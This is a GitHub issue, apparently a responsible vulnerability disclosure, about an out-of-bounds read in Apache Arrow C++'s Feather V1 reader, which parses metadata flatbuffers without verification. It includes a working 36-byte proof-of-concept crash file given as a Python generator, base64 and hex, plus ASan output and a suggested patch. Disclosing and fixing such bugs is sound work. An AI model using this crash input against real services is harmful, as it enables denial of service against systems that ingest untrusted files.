Skip to content

Out-of-bounds read in Apache Arrow C++ Feather V1 reader: feather::Reader::Open calls fbs::GetCTable with no flatbuffers::Verifier #50229

@OwenSanzas

Description

@OwenSanzas

Summary

Opening a crafted Feather V1 file through the public
arrow::ipc::feather::Reader::Open API triggers an AddressSanitizer
heap-buffer-overflow (out-of-bounds read) inside Arrow's legacy Feather V1
metadata parsing. The reader calls fbs::GetCTable on the trailing metadata
flatbuffer without first running a flatbuffers::Verifier, then
dereferences attacker-controlled offsets in ReaderV1::ReadSchema
(cpp/src/arrow/ipc/feather.cc:178) before any Status error can be returned.
A 36-byte file with the FEA1 magic and a corrupt footer triggers the crash
deterministically, so any service that ingests untrusted Feather V1 files can be
crashed (denial of service).

Tested at pinned commit 16fe34250a2ef261790b9cc414fdf0831669cf9f
(25.0.0-SNAPSHOT).

Root Cause

ReaderV1::Open reads the trailing metadata flatbuffer and obtains a typed view
of it via fbs::GetCTable(...). A flatbuffer obtained this way is untrusted:
its vtable, field offsets, and vector lengths are attacker-controlled bytes. The
flatbuffers contract requires a caller to run a flatbuffers::Verifier over the
buffer before touching any generated accessor; only verification guarantees that
every offset stays inside the buffer.

ReaderV1::Open skips that step. It goes straight from GetCTable to
ReadSchema(), which dereferences metadata_->columns() on the unverified
table. columns() is a flatbuffers GetPointer that reads the vtable and an
offset field; with a corrupt offset, flatbuffers::ReadScalar reads past the end
of the metadata buffer.

Vulnerable code (cpp/src/arrow/ipc/feather.cc:172):

    metadata_ = fbs::GetCTable(metadata_buffer_->data());   // no flatbuffers::Verifier
    return ReadSchema();
  }

  Status ReadSchema() {
    std::vector<std::shared_ptr<Field>> fields;
    for (int i = 0; i < static_cast<int>(metadata_->columns()->size()); ++i) {  // line 178: deref unverified flatbuffer
      const fbs::Column* col = metadata_->columns()->Get(i);
      std::shared_ptr<DataType> type;
      RETURN_NOT_OK(
          GetDataType(col->values(), col->metadata_type(), col->metadata(), &type));
      fields.push_back(::arrow::field(col->name()->str(), type));
    }

Call chain (attacker bytes -> fault):

arrow::ipc::feather::Reader::Open          feather.cc:773 / :794  (public API)
  -> ReaderV1::Open                        feather.cc:173
       metadata_ = fbs::GetCTable(...)      feather.cc:172   <- NO flatbuffers::Verifier
     -> ReaderV1::ReadSchema               feather.cc:178
          metadata_->columns()->size()  -> fbs::CTable::columns()  feather_generated.h:698
            -> flatbuffers::Table::GetVTable
              -> flatbuffers::ReadScalar   base.h:440   <- OOB read

The metadata buffer is sized to the file's declared metadata_length; the
corrupt offset points past that region, so the accessor reads out of bounds.
Arrow's own threat model (docs/source/cpp/security.rst, "Ingesting untrusted
data") states the IPC reader APIs must return an arrow::Status error on
malformed input. The V1 reader violates that contract: it crashes before it can
return a Status.

PoC

A 36-byte malformed Feather V1 file: the FEA1 magic header, padding, a
metadata_length of 0, and the trailing FEA1 magic. Reader::Open selects
the legacy V1 path on the FEA1 magic, then GetCTable builds a table over an
empty/short metadata region and columns() reads out of bounds.

# generate_poc.py — re-create the shipped 36-byte crash input
poc = (b"FEA1"          # leading magic
       + b"\xff" * 24    # corrupt footer body
       + b"\x00\x00\x00\x00"  # metadata_length = 0
       + b"FEA1")        # trailing magic
open("poc.bin", "wb").write(poc)
assert len(poc) == 36

Crash input size: 36 bytes (poc/poc.bin, md5 9d96bcc065b6672396fed18492792d03).

Reproduction

Build Arrow C++ from source with -DARROW_IPC=ON and AddressSanitizer, then open the attached Feather
V1 file through the public reader API:

#include <arrow/ipc/feather.h>
#include <arrow/io/memory.h>
// auto buf = ...read poc.bin...;
auto source = std::make_shared<arrow::io::BufferReader>(buf);
std::shared_ptr<arrow::ipc::feather::Reader> reader;
auto st = arrow::ipc::feather::Reader::Open(source).Value(&reader);   // OOB read here

ReaderV1::Open does metadata_ = fbs::GetCTable(metadata_buffer_->data()) with no
flatbuffers::Verifier
over the metadata, then ReadSchema() dereferences metadata_->columns() on
the unverified flatbuffer:

AddressSanitizer: heap-buffer-overflow READ
  #0 flatbuffers::ReadScalar<...>            base.h
  #1 arrow::ipc::feather::fbs::CTable::columns()  feather_generated.h
  #2 ReaderV1::ReadSchema / ReaderV1::Open   ipc/feather.cc

The unverified GetCTable + columns() deref is still present in current master (cpp/src/arrow/ipc/feather.cc:172).
PoC: 36-byte .feather file (recreate from the base64 below).

Suggested Fix

Run a flatbuffers::Verifier over the metadata buffer before calling
fbs::GetCTable / dereferencing any accessor, returning Status::Invalid on
failure — matching how the V2/IPC reader rejects malformed metadata:

   ARROW_ASSIGN_OR_RAISE(metadata_buffer_,
                         source->ReadAt(size - footer_size - metadata_length,
                                        metadata_length, /*allow_short_read=*/false));

-  metadata_ = fbs::GetCTable(metadata_buffer_->data());
+  flatbuffers::Verifier verifier(metadata_buffer_->data(),
+                                 metadata_buffer_->size());
+  if (!fbs::VerifyCTableBuffer(verifier)) {
+    return Status::Invalid("Feather V1 metadata failed flatbuffer verification");
+  }
+  metadata_ = fbs::GetCTable(metadata_buffer_->data());
   return ReadSchema();

(The exact verifier symbol depends on the generated feather_generated.h; the
principle is "verify before accessing", and the precise call is the upstream
maintainer's judgement.)

PoC bytes (self-contained)

The trigger input is 36 bytes (poc/poc.bin).
Recreate it exactly with:

base64 -d > poc.bin <<'B64'
RkVBMf///////////////////////////////wAAAABGRUEx
B64

Hex: 46454131ffffffffffffffffffffffffffffffffffffffffffffffff0000000046454131

Credit

Aisle Research (Ze Sheng (O2Lab & TAMU), Dmitrijs Trizna, Luigino Camastra, Guido Vranken).

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions